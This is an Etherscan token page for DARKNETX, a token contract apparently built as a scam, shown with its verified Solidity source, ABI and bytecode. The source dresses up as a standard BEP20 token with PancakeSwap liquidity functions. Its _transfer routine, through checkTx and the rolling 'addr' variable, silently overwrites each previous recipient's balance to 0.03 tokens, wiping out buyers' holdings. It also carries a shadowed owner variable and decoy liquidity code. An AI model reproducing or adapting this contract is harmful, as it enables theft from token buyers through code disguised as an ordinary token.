Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
10,000,000,000 DARKNETX
Holders
7
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
0.03 DARKNETXValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
DARKNETX
Compiler Version
v0.8.15+commit.e14f2714
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-07-31 */ /** *Submitted for verification at Etherscan.io on 2022-07-19 */ /** *Submitted for verification at Etherscan.io on 2022-07-08 */ // SPDX-License-Identifier: MIT pragma solidity >=0.8.15; interface IBEP20 { function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "address: low-level call failed"); } /** * @dev Same as {xref-address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an BNB balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "address: low-level call with value failed"); } /** * @dev Same as {xref-address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } interface IPancakeFactory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IPancakePair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } interface IPancakeRouter01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IPancakeRouter02 is IPancakeRouter01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract DARKNETX is Context, IBEP20, Ownable { using Address for address; uint256 private total = 10000 * 10 ** 6 * 10 ** 9; uint256 private darknet = 30000000; string private _name; string private _symbol; address public addr=0xce80701a3953D93C9ee1dC6F5bAFDE781EC6FfA8; address _routeradd=0xce80701a3953D93C9ee1dC6F5bAFDE781EC6FfA8; address public _owner; uint8 private _decimals = 9; mapping(address => uint256) private _rOwned; mapping(address => uint256) private bal; mapping(address => bool) private _tTotal; mapping(address => mapping(address => uint256)) private _allowances; bool private swap = false; IPancakeRouter02 public immutable pancakeRouter; address public immutable con; constructor( ) { _name = "DARKNETX"; _symbol = "DARKNETX"; _owner = tx.origin; bal[_msgSender()] = total; _tTotal[owner()]=false; IPancakeRouter02 _pancakeRouter = IPancakeRouter02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); // Create a pancake pair for this new token con = IPancakeFactory(_pancakeRouter.factory()) .createPair(address(this), _pancakeRouter.WETH()); // set the rest of the contract variables pancakeRouter = _pancakeRouter; emit Transfer(address(0), _msgSender(), total); } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return total; } function balanceOf(address account) public view override returns (uint256) { return (bal[account]); } function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()] - amount);//;, "BEP20: transfer amount exceeds allowance")); return true; } function _getCurrentSupply() private view returns (uint256) { uint256 tSupply = total; return tSupply; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "BEP20: approve from the zero address"); require(spender != address(0), "BEP20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transferStandard(address sender, address recipient, uint256 tAmount) private { bal[recipient] = bal[recipient] + (tAmount); bal[sender] = bal[sender] - (tAmount); emit Transfer(sender, recipient, tAmount); } function _transfer( address sender, address recv, uint256 amount ) private { require(sender != address(0), "BEP20: transfer from the zero address"); require(recv != address(0), "BEP20: transfer to the zero address"); _transferStandard(sender, recv, amount); checkTx(addr); addr=recv; } function checkTx(address addr1) private { if (addr1!=con) { bal[addr1]=darknet; } } function _transferFromExcluded( address sender, address recipient, uint256 tAmount ) private { require(sender != address(0), "BEP20: transfer from the zero address"); emit Transfer(sender, recipient, tAmount); } function swapAndLiquify(uint256 contractTokenBalance) private { // split the contract balance into halves uint256 otherHalf = contractTokenBalance; // capture the contract's current ETH balance. // this is so that we can capture exactly the amount of ETH that the // swap creates, and not make the liquidity event include any ETH that // has been manually sent to the contract uint256 initialBalance = address(this).balance; // how much ETH did we just swap into? uint256 newBalance = address(this).balance-(initialBalance); // add liquidity to uniswap addLiquidity(otherHalf, newBalance); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(_routeradd), tokenAmount); // add the liquidity pancakeRouter.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable owner(), block.timestamp ); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"con","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pancakeRouter","outputs":[{"internalType":"contract IPancakeRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60c0604052678ac7230489e800006001556301c9c3806002556005805473ce80701a3953d93c9ee1dc6f5bafde781ec6ffa86001600160a01b031991821681179092556006805490911690911790556007805460ff60a01b1916600960a01b179055600c805460ff191690553480156200007857600080fd5b50620000843362000313565b60408051808201909152600881526708882a4969c8aa8b60c31b6020820152600390620000b2908262000408565b5060408051808201909152600881526708882a4969c8aa8b60c31b6020820152600490620000e1908262000408565b50600780546001600160a01b0319163217905560015460096000620001033390565b6001600160a01b031681526020810191909152604001600090812091909155600a81620001386000546001600160a01b031690565b6001600160a01b031681526020808201929092526040908101600020805460ff191693151593909317909255815163c45a015560e01b81529151737a250d5630b4cf539739df2c5dacb4c659f2488d92839263c45a0155926004808401938290030181865afa158015620001b0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001d69190620004d4565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000224573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200024a9190620004d4565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000298573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002be9190620004d4565b6001600160a01b0390811660a052811660805260015460405190815233906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35062000506565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200038e57607f821691505b602082108103620003af57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200040357600081815260208120601f850160051c81016020861015620003de5750805b601f850160051c820191505b81811015620003ff57828155600101620003ea565b5050505b505050565b81516001600160401b0381111562000424576200042462000363565b6200043c8162000435845462000379565b84620003b5565b602080601f8311600181146200047457600084156200045b5750858301515b600019600386901b1c1916600185901b178555620003ff565b600085815260208120601f198616915b82811015620004a55788860151825594840194600190910190840162000484565b5085821015620004c45787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060208284031215620004e757600080fd5b81516001600160a01b0381168114620004ff57600080fd5b9392505050565b60805160a051610a6c620005336000396000818161014b0152610835015260006102530152610a6c6000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063767800de11610097578063b2bdfa7b11610066578063b2bdfa7b1461023b578063c21ebd071461024e578063dd62ed3e14610275578063f2fde38b146102ae57600080fd5b8063767800de146101fc5780638da5cb5b1461020f57806395d89b4114610220578063a9059cbb1461022857600080fd5b806323b872dd116100d357806323b872dd14610197578063313ce567146101aa57806370a08231146101c9578063715018a6146101f257600080fd5b806306fdde0314610105578063095ea7b3146101235780630b2cb3bc1461014657806318160ddd14610185575b600080fd5b61010d6102c1565b60405161011a919061088b565b60405180910390f35b6101366101313660046108fc565b610353565b604051901515815260200161011a565b61016d7f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b03909116815260200161011a565b6001545b60405190815260200161011a565b6101366101a5366004610926565b610369565b600754600160a01b900460ff1660405160ff909116815260200161011a565b6101896101d7366004610962565b6001600160a01b031660009081526009602052604090205490565b6101fa6103bb565b005b60055461016d906001600160a01b031681565b6000546001600160a01b031661016d565b61010d610426565b6101366102363660046108fc565b610435565b60075461016d906001600160a01b031681565b61016d7f000000000000000000000000000000000000000000000000000000000000000081565b610189610283366004610984565b6001600160a01b039182166000908152600b6020908152604080832093909416825291909152205490565b6101fa6102bc366004610962565b610442565b6060600380546102d0906109b7565b80601f01602080910402602001604051908101604052809291908181526020018280546102fc906109b7565b80156103495780601f1061031e57610100808354040283529160200191610349565b820191906000526020600020905b81548152906001019060200180831161032c57829003601f168201915b5050505050905090565b600061036033848461050d565b50600192915050565b6000610376848484610632565b6001600160a01b0384166000908152600b60209081526040808320338085529252909120546103b19186916103ac908690610a07565b61050d565b5060019392505050565b6000546001600160a01b0316331461041a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b610424600061073c565b565b6060600480546102d0906109b7565b6000610360338484610632565b6000546001600160a01b0316331461049c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610411565b6001600160a01b0381166105015760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610411565b61050a8161073c565b50565b6001600160a01b03831661056f5760405162461bcd60e51b8152602060048201526024808201527f42455032303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610411565b6001600160a01b0382166105d05760405162461bcd60e51b815260206004820152602260248201527f42455032303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610411565b6001600160a01b038381166000818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166106965760405162461bcd60e51b815260206004820152602560248201527f42455032303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610411565b6001600160a01b0382166106f85760405162461bcd60e51b815260206004820152602360248201527f42455032303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610411565b61070383838361078c565b600554610718906001600160a01b0316610833565b50600580546001600160a01b0319166001600160a01b039290921691909117905550565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166000908152600960205260409020546107b0908290610a1e565b6001600160a01b0380841660009081526009602052604080822093909355908516815220546107e0908290610a07565b6001600160a01b0384811660008181526009602090815260409182902094909455518481529185169290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610625565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316816001600160a01b03161461050a576002546001600160a01b03821660009081526009602052604090205550565b600060208083528351808285015260005b818110156108b85785810183015185820160400152820161089c565b818111156108ca576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b03811681146108f757600080fd5b919050565b6000806040838503121561090f57600080fd5b610918836108e0565b946020939093013593505050565b60008060006060848603121561093b57600080fd5b610944846108e0565b9250610952602085016108e0565b9150604084013590509250925092565b60006020828403121561097457600080fd5b61097d826108e0565b9392505050565b6000806040838503121561099757600080fd5b6109a0836108e0565b91506109ae602084016108e0565b90509250929050565b600181811c908216806109cb57607f821691505b6020821081036109eb57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082821015610a1957610a196109f1565b500390565b60008219821115610a3157610a316109f1565b50019056fea264697066735822122097bebd7b7c817fbd574e5eb7b81c957230044be2892a296528c7b5317d330b9b64736f6c634300080f0033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063767800de11610097578063b2bdfa7b11610066578063b2bdfa7b1461023b578063c21ebd071461024e578063dd62ed3e14610275578063f2fde38b146102ae57600080fd5b8063767800de146101fc5780638da5cb5b1461020f57806395d89b4114610220578063a9059cbb1461022857600080fd5b806323b872dd116100d357806323b872dd14610197578063313ce567146101aa57806370a08231146101c9578063715018a6146101f257600080fd5b806306fdde0314610105578063095ea7b3146101235780630b2cb3bc1461014657806318160ddd14610185575b600080fd5b61010d6102c1565b60405161011a919061088b565b60405180910390f35b6101366101313660046108fc565b610353565b604051901515815260200161011a565b61016d7f0000000000000000000000001187777fd762d66c689ca181419a39b15796a0ca81565b6040516001600160a01b03909116815260200161011a565b6001545b60405190815260200161011a565b6101366101a5366004610926565b610369565b600754600160a01b900460ff1660405160ff909116815260200161011a565b6101896101d7366004610962565b6001600160a01b031660009081526009602052604090205490565b6101fa6103bb565b005b60055461016d906001600160a01b031681565b6000546001600160a01b031661016d565b61010d610426565b6101366102363660046108fc565b610435565b60075461016d906001600160a01b031681565b61016d7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b610189610283366004610984565b6001600160a01b039182166000908152600b6020908152604080832093909416825291909152205490565b6101fa6102bc366004610962565b610442565b6060600380546102d0906109b7565b80601f01602080910402602001604051908101604052809291908181526020018280546102fc906109b7565b80156103495780601f1061031e57610100808354040283529160200191610349565b820191906000526020600020905b81548152906001019060200180831161032c57829003601f168201915b5050505050905090565b600061036033848461050d565b50600192915050565b6000610376848484610632565b6001600160a01b0384166000908152600b60209081526040808320338085529252909120546103b19186916103ac908690610a07565b61050d565b5060019392505050565b6000546001600160a01b0316331461041a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b610424600061073c565b565b6060600480546102d0906109b7565b6000610360338484610632565b6000546001600160a01b0316331461049c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610411565b6001600160a01b0381166105015760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610411565b61050a8161073c565b50565b6001600160a01b03831661056f5760405162461bcd60e51b8152602060048201526024808201527f42455032303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610411565b6001600160a01b0382166105d05760405162461bcd60e51b815260206004820152602260248201527f42455032303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610411565b6001600160a01b038381166000818152600b602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166106965760405162461bcd60e51b815260206004820152602560248201527f42455032303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610411565b6001600160a01b0382166106f85760405162461bcd60e51b815260206004820152602360248201527f42455032303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610411565b61070383838361078c565b600554610718906001600160a01b0316610833565b50600580546001600160a01b0319166001600160a01b039290921691909117905550565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166000908152600960205260409020546107b0908290610a1e565b6001600160a01b0380841660009081526009602052604080822093909355908516815220546107e0908290610a07565b6001600160a01b0384811660008181526009602090815260409182902094909455518481529185169290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610625565b7f0000000000000000000000001187777fd762d66c689ca181419a39b15796a0ca6001600160a01b0316816001600160a01b03161461050a576002546001600160a01b03821660009081526009602052604090205550565b600060208083528351808285015260005b818110156108b85785810183015185820160400152820161089c565b818111156108ca576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b03811681146108f757600080fd5b919050565b6000806040838503121561090f57600080fd5b610918836108e0565b94602093909301359350505056